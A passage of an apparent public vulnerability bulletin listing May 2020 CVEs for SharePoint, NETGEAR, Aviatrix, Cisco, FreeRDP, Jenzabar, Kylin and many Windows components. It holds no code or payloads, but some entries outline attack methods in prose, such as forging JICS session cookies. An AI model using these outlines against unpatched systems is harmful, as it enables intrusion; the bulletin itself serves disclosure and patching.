A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1100, CVE-2020-1101, CVE-2020-1106. 2020-05-21 3.5 CVE-2020-1099
MISC netgear -- multiple_products
  An issue was discovered on NETGEAR Orbi Tri-Band Business WiFi Add-on Satellite (SRS60) AC3000 V2.5.1.106, Outdoor Satellite (RBS50Y) V2.5.1.106, and Pro Tri-Band Business WiFi Router (SRR60) AC3000 V2.5.1.106. The administrative SOAP interface allows an unauthenticated remote leak of sensitive/arbitrary Wi-Fi information, such as SSIDs and Pre-Shared-Keys (PSK). 2020-05-18 3.3 CVE-2020-11550
MISC
MISC
MISC pulseaudio -- pulseaudio
  An Ubuntu-specific modification to Pulseaudio to provide security mediation for Snap-packaged applications was found to have a bypass of intended access restriction for snaps that plug any of pulseaudio, audio-playback or audio-record via unloading the pulseaudio snap policy module. This issue affects: pulseaudio 1:8.0 versions prior to 1:8.0-0ubuntu3.12; 1:11.1 versions prior to 1:11.1-1ubuntu7.7; 1:13.0 versions prior to 1:13.0-1ubuntu1.2; 1:13.99.1 versions prior to 1:13.99.1-1ubuntu3.2. 2020-05-15 2.1 CVE-2020-11931
MISC
UBUNTU rconfig -- rconfig
  rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php. 2020-05-18 3.5 CVE-2020-12259
MISC rconfig -- rconfig
  rConfig 3.9.4 is vulnerable to reflected XSS. The devicemgmnt.php file improperly validates user input. An attacker can exploit this by crafting arbitrary JavaScript in the deviceId GET parameter to devicemgmnt.php. 2020-05-18 3.5 CVE-2020-12256
MISC submitty -- submitty
  Submitty through 20.04.01 allows XSS via upload of an SVG document, as demonstrated by an attack by a Student against a Teaching Fellow. 2020-05-15 3.5 CVE-2020-12882
MISC
MISC yaws -- yaws
  yaws_config.erl in Yaws through 2.0.2 and/or 2.0.7 loads obsolete TLS ciphers, as demonstrated by ones that allow Sweet32 attacks. 2020-05-15 2.1 CVE-2020-12872
MISC
MISC
MISC
MISC

 

Severity Not Yet Assigned

Primary Vendor -- Product   Description   Published   CVSS Score   Source & Patch Info
anchorfree -- vpn_sdk An issue was discovered in AnchorFree VPN SDK before 1.3.3.218. The VPN SDK service takes certain executable locations over a socket bound to localhost. Binding to the socket and providing a path where a malicious executable file resides leads to executing the malicious executable file with SYSTEM privileges. 2020-05-21 not yet calculated CVE-2020-12828
MISC apache -- kylin
  Kylin has some RESTful APIs that concatenate OS commands with the user input string, so a user is likely to be able to execute any OS command without any protection or validation. 2020-05-22 not yet calculated CVE-2020-1956
MISC aviatrix -- controller An issue was discovered in Aviatrix Controller before 5.4.1204. It contains credentials unused by the software. 2020-05-22 not yet calculated CVE-2020-13414
MISC aviatrix -- controller
  An issue was discovered in Aviatrix Controller before 5.4.1204. An API call on the web interface lacked a session token check to control access, leading to CSRF. 2020-05-22 not yet calculated CVE-2020-13412
MISC aviatrix -- controller
  An issue was discovered in Aviatrix Controller before 5.4.1066. A Controller Web Interface session token parameter is not required on an API call, which opens the application up to a Cross Site Request Forgery (CSRF) vulnerability for password resets. 2020-05-22 not yet calculated CVE-2020-13416
MISC aviatrix -- controller
  An issue was discovered in Aviatrix Controller through 5.1. An attacker with any signed SAML assertion from the Identity Provider can establish a connection (even if that SAML assertion has expired or is from a user who is not authorized to access Aviatrix), aka XML Signature Wrapping. 2020-05-22 not yet calculated CVE-2020-13415
MISC aviatrix -- controller
  An issue was discovered in Aviatrix Controller before 5.4.1204. There is an Observable Response Discrepancy from the API, which makes it easier to perform user enumeration via brute force. 2020-05-22 not yet calculated CVE-2020-13413
MISC aviatrix -- vpn_client
  An Elevation of Privilege issue was discovered in Aviatrix VPN Client before 2.10.7, because of an incomplete fix for CVE-2020-7224. This affects Linux, macOS, and Windows installations for certain OpenSSL parameters. 2020-05-22 not yet calculated CVE-2020-13417
MISC

cisco -- amp_for_endpoints_linux_connector_software_and_amp_for_endpoints_mac_connector_software

A vulnerability in Cisco AMP for Endpoints Linux Connector Software and Cisco AMP for Endpoints Mac Connector Software could allow an authenticated, local attacker to cause a buffer overflow on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted packet to an affected device. A successful exploit could allow the attacker to cause the Cisco AMP for Endpoints service to crash and restart. 2020-05-22 not yet calculated CVE-2020-3343
CISCO

cisco -- amp_for_endpoints_linux_connector_software_and_amp_for_endpoints_mac_connector_software

A vulnerability in Cisco AMP for Endpoints Linux Connector Software and Cisco AMP for Endpoints Mac Connector Software could allow an authenticated, local attacker to cause a buffer overflow on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted packet to an affected device. A successful exploit could allow the attacker to cause the Cisco AMP for Endpoints service to crash and restart. 2020-05-22 not yet calculated CVE-2020-3344
CISCO

cisco -- amp_for_endpoints_mac_connector_software

A vulnerability in the file scan process of Cisco AMP for Endpoints Mac Connector Software could cause the scan engine to crash during the scan of local files, resulting in a restart of the AMP Connector and a denial of service (DoS) condition of the Cisco AMP for Endpoints service. The vulnerability is due to insufficient input validation of specific file attributes. An attacker could exploit this vulnerability by providing a crafted file to a user of an affected system. A successful exploit could allow the attacker to cause the Cisco AMP for Endpoints service to crash, resulting in missed detection and logging of the potentially malicious file. Continued attempts to scan the file could result in a DoS condition of the Cisco AMP for Endpoints service. 2020-05-22 not yet calculated CVE-2020-3314
CISCO cisco -- prime_collaboration_provisioning_software
  A vulnerability in the web-based management interface of Cisco Prime Collaboration Provisioning Software could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. The vulnerability exists because the web-based management interface improperly validates user input for specific SQL queries. An attacker could exploit this vulnerability by authenticating to the application with valid administrative credentials and sending malicious requests to an affected system. A successful exploit could allow the attacker to view information that they are not authorized to view, make changes to the system that they are not authorized to make, or delete information from the database that they are not authorized to delete. 2020-05-22 not yet calculated CVE-2020-3184
CISCO cisco -- prime_network_registrar
  A vulnerability in the DHCP server of Cisco Prime Network Registrar could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient input validation of incoming DHCP traffic. An attacker could exploit this vulnerability by sending a crafted DHCP request to an affected device. A successful exploit could allow the attacker to cause a restart of the DHCP server process, causing a DoS condition. 2020-05-22 not yet calculated CVE-2020-3272
CISCO cisco -- unified_contact_center_express
  A vulnerability in the Java Remote Management Interface of Cisco Unified Contact Center Express (Unified CCX) could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to insecure deserialization of user-supplied content by the affected software. An attacker could exploit this vulnerability by sending a malicious serialized Java object to a specific listener on an affected system. A successful exploit could allow the attacker to execute arbitrary code as the root user on an affected device. 2020-05-22 not yet calculated CVE-2020-3280
CISCO epson -- eb-1470ui_main_devices
  An exploitable authentication bypass vulnerability exists in the EPSON Web Control functionality of Epson EB-1470Ui MAIN: 98009273ESWWV107 MAIN2: 8X7325WWV303. A specially crafted series of HTTP requests can cause authentication bypass resulting in information disclosure. An attacker can send an HTTP request to trigger this vulnerability. 2020-05-22 not yet calculated CVE-2020-6091
MISC

freerdp -- freerdp

An issue was discovered in FreeRDP before 2.1.1. An out-of-bounds (OOB) read vulnerability has been detected in security_fips_decrypt in libfreerdp/core/security.c due to an uninitialized value. 2020-05-22 not yet calculated CVE-2020-13397
MISC
MISC
MISC freerdp -- freerdp
  An issue was discovered in FreeRDP before 2.1.1. An out-of-bounds (OOB) write vulnerability has been detected in crypto_rsa_common in libfreerdp/crypto/crypto.c. 2020-05-22 not yet calculated CVE-2020-13398
MISC
MISC
MISC freerdp -- freerdp
  An issue was discovered in FreeRDP before 2.1.1. An out-of-bounds (OOB) read vulnerability has been detected in ntlm_read_ChallengeMessage in winpr/libwinpr/sspi/NTLM/ntlm_message.c. 2020-05-22 not yet calculated CVE-2020-13396
MISC
MISC
MISC microsoft -- multiple_sharepoint_products A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1104, CVE-2020-1105. 2020-05-21 not yet calculated CVE-2020-1107
MISC microsoft -- multiple_sharepoint_products
  A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1105, CVE-2020-1107. 2020-05-21 not yet calculated CVE-2020-1104
MISC jenzabar -- internet_campus_solution
  Jenzabar JICS (aka Internet Campus Solution) before 9.0.1 Patch 3, 9.1 before 9.1.2 Patch 2, and 9.2 before 9.2.2 Patch 8 has session cookies that are a deterministic function of the username. There is a hard-coded password to supply a PBKDF feeding into AES to encrypt a username and base64 encode it to a client-side cookie for persistent session authentication. By knowing the key and algorithm, an attacker can select any username, encrypt it, base64 encode it, and save it in their browser with the correct JICSLoginCookie cookie format to impersonate any real user in the JICS database without the need for authenticating (or verifying with MFA if implemented). 2020-05-19 not yet calculated CVE-2020-8434
MISC johnson_controls -- software_house_c•cure_9000
  During installation or upgrade to Software House C•CURE 9000 v2.70 and American Dynamics victor Video Management System v5.2, the credentials of the user used to perform the installation or upgrade are logged in a file. The install log file persists after the installation. 2020-05-21 not yet calculated CVE-2020-9045
CONFIRM
CERT joomla! -- joomla! The XCloner component before 3.5.4 for Joomla! allows Authenticated Local File Disclosure. 2020-05-23 not yet calculated CVE-2020-13424
MISC kaoni -- ezhttptrans
  Ezhttptrans.ocx ActiveX Control in Kaoni ezHTTPTrans 1.0.0.70 and prior versions contains a vulnerability that could allow a remote attacker to download and execute an arbitrary file by setting the arguments to the ActiveX method. This can be leveraged for code execution. 2020-05-22 not yet calculated CVE-2020-7813
MISC
MISC linux -- linux_kernel
  A NULL pointer dereference flaw was found in the Linux kernel's SELinux subsystem in versions before 5.7. This flaw occurs while importing the Commercial IP Security Option (CIPSO) protocol's category bitmap into the SELinux extensible bitmap via the 'ebitmap_netlbl_import' routine. While processing the CIPSO restricted bitmap tag in the 'cipso_v4_parsetag_rbm' routine, it sets the security attribute to indicate that the category bitmap is present, even if it has not been allocated. This issue leads to a NULL pointer dereference issue while importing the same category bitmap into SELinux. This flaw allows a remote network user to crash the system kernel, resulting in a denial of service. 2020-05-22 not yet calculated CVE-2020-10711
CONFIRM
CONFIRM meinheld -- meinheld meinheld prior to 1.0.2 is vulnerable to HTTP Request Smuggling. HTTP pipelining issues and request smuggling attacks might be possible due to incorrect Content-Length and Transfer encoding header parsing. 2020-05-22 not yet calculated CVE-2020-7658
MISC
MISC microsoft -- .net_framework
  An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program. The update addresses the vulnerability by correcting how .NET Framework activates COM objects, aka '.NET Framework Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1066
MISC microsoft -- asp.net_core_and_visual_studio_2017_and_2019
  A denial of service vulnerability exists when ASP.NET Core improperly handles web requests, aka 'ASP.NET Core Denial of Service Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1161
MISC microsoft -- chakracore_and_edge_(html-based) A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1065
MISC microsoft -- chakracore_and_edge_(html-based) A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based), aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1037
MISC microsoft -- dynamics_365_(on-premises)
  A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1063
MISC microsoft -- edge_(chromium-based) An elevation of privilege vulnerability exists in Microsoft Edge (Chromium-based) when the Feedback extension improperly validates input, aka 'Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1195
MISC microsoft -- edge_(html-based) A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content, aka 'Microsoft Edge Spoofing Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1059
MISC microsoft -- edge_(html-based)
  A remote code execution vulnerability exists when Microsoft Edge PDF Reader improperly handles objects in memory, aka 'Microsoft Edge PDF Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1096
MISC microsoft -- edge_(html-based)
  An elevation of privilege vulnerability exists when Microsoft Edge does not properly enforce cross-domain policies, which could allow an attacker to access information from one domain and inject it into another domain. In a web-based attack scenario, an attacker could host a website that is used to attempt to exploit the vulnerability, aka 'Microsoft Edge Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1056
MISC microsoft -- internet_explorer_9_and_11 A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1035, CVE-2020-1058, CVE-2020-1060. 2020-05-21 not yet calculated CVE-2020-1093
MISC microsoft -- internet_explorer_9_and_11
  A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka 'Internet Explorer Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1062. 2020-05-21 not yet calculated CVE-2020-1092
MISC microsoft -- internet_explorer_9_and_11
  A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1035, CVE-2020-1060, CVE-2020-1093. 2020-05-21 not yet calculated CVE-2020-1058
MISC microsoft -- internet_explorer_9_and_11
  A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1058, CVE-2020-1060, CVE-2020-1093. 2020-05-21 not yet calculated CVE-2020-1035
MISC microsoft -- internet_explorer_9_and_11
  A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'VBScript Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1035, CVE-2020-1058, CVE-2020-1093. 2020-05-21 not yet calculated CVE-2020-1060
MISC microsoft -- internet_explorer_9_and_11
  A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka 'Internet Explorer Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1092. 2020-05-21 not yet calculated CVE-2020-1062
MISC microsoft -- internet_explorer_9_and_11
  A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user, aka 'MSHTML Engine Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1064
MISC microsoft -- multiple_products A denial of service vulnerability exists when .NET Core or .NET Framework improperly handles web requests, aka '.NET Core & .NET Framework Denial of Service Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1108
MISC microsoft -- multiple_sharepoint_products
  A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1024, CVE-2020-1102. 2020-05-21 not yet calculated CVE-2020-1023
MISC microsoft -- multiple_sharepoint_products
  A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1023, CVE-2020-1102. 2020-05-21 not yet calculated CVE-2020-1024
MISC microsoft -- multiple_sharepoint_products
  An information disclosure vulnerability exists where certain modes of the search function in Microsoft SharePoint Server are vulnerable to cross-site search attacks (a variant of cross-site request forgery, CSRF). When users are simultaneously logged in to Microsoft SharePoint Server and visit a malicious web page, the attacker can, through standard browser functionality, induce the browser to invoke search queries as the logged in user, aka 'Microsoft SharePoint Information Disclosure Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1103
MISC microsoft -- multiple_sharepoint_products
  A remote code execution vulnerability exists in Microsoft SharePoint Server when it fails to properly identify and filter unsafe ASP.Net web controls, aka 'Microsoft SharePoint Server Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1069
MISC microsoft -- multiple_windows_products A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1028, CVE-2020-1126, CVE-2020-1150. 2020-05-21 not yet calculated CVE-2020-1136
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists when the Windows Printer Service improperly validates file paths while loading printer drivers, aka 'Windows Printer Service Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1081
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1114. 2020-05-21 not yet calculated CVE-2020-1087
MISC microsoft -- multiple_windows_products A remote code execution vulnerability exists in the way that Windows handles objects in memory, aka 'Windows Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1067
MISC microsoft -- multiple_windows_products A remote code execution vulnerability exists in the way that the Microsoft Script Runtime handles objects in memory, aka 'Microsoft Script Runtime Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1061
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. To exploit the vulnerability, an attacker would require unprivileged execution on the victim system, aka 'Windows Installer Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1078
MISC microsoft -- multiple_windows_products A denial of service vulnerability exists when Windows improperly handles objects in memory, aka 'Windows Denial of Service Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1076
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1021, CVE-2020-1082. 2020-05-21 not yet calculated CVE-2020-1088
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists when Windows improperly handles calls to Clipboard Service, aka 'Windows Clipboard Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1111, CVE-2020-1165, CVE-2020-1166. 2020-05-21 not yet calculated CVE-2020-1121
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1158
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles file and folder links, aka 'Windows Error Reporting Manager Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1132
MISC microsoft -- multiple_windows_products A remote code execution vulnerability exists in the way that the Color Management Module (ICM32.dll) handles objects in memory, aka 'Microsoft Color Management Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1117
MISC microsoft -- multiple_windows_products An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0963, CVE-2020-1141, CVE-2020-1145. 2020-05-21 not yet calculated CVE-2020-1179
MISC microsoft -- multiple_windows_products An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0963, CVE-2020-1145, CVE-2020-1179. 2020-05-21 not yet calculated CVE-2020-1141
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory, aka 'DirectX Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1140
MISC microsoft -- multiple_windows_products An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory, aka 'Windows Graphics Component Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1135
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1125
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1139
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Storage Service improperly handles file operations, aka 'Windows Storage Service Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1138
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory, aka 'Windows Push Notification Service Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1137
MISC microsoft -- multiple_windows_products
  An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1141, CVE-2020-1145, CVE-2020-1179. 2020-05-21 not yet calculated CVE-2020-0963
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 not yet calculated CVE-2020-1134
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1149
MISC microsoft -- multiple_windows_products
  A security feature bypass vulnerability exists in Microsoft Windows when the Task Scheduler service fails to properly verify client connections over RPC, aka 'Windows Task Scheduler Security Feature Bypass Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1113
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 not yet calculated CVE-2020-1131
MISC microsoft -- multiple_windows_products
  A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1028, CVE-2020-1136, CVE-2020-1150. 2020-05-21 not yet calculated CVE-2020-1126
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory, aka 'Windows Common Log File System Driver Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1154
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 not yet calculated CVE-2020-1124
MISC microsoft -- multiple_windows_products
  A denial of service vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations, aka 'Connected User Experiences and Telemetry Service Denial of Service Vulnerability'. This CVE ID is unique from CVE-2020-1084. 2020-05-21 not yet calculated CVE-2020-1123
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1087. 2020-05-21 not yet calculated CVE-2020-1114
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1054. 2020-05-21 not yet calculated CVE-2020-1143
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1151
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1156
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory, aka 'Windows Update Stack Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1109. 2020-05-21 not yet calculated CVE-2020-1110
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1155
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1157
MISC microsoft -- multiple_windows_products
  A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka 'Microsoft Graphics Components Remote Code Execution Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1153
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when Windows improperly handles calls to Clipboard Service, aka 'Windows Clipboard Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1121, CVE-2020-1165, CVE-2020-1166. 2020-05-21 not yet calculated CVE-2020-1111
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164. 2020-05-21 not yet calculated CVE-2020-1086
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, aka 'Windows GDI Elevation of Privilege Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1142
MISC microsoft -- multiple_windows_products
  An information disclosure vulnerability exists when Windows Subsystem for Linux improperly handles objects in memory, aka 'Windows Subsystem for Linux Information Disclosure Vulnerability'. 2020-05-21 not yet calculated CVE-2020-1075
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1184, CVE-2020-1185, CVE-2020-1186, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191. 2020-05-21 not yet calculated CVE-2020-1187
MISC microsoft -- multiple_windows_products
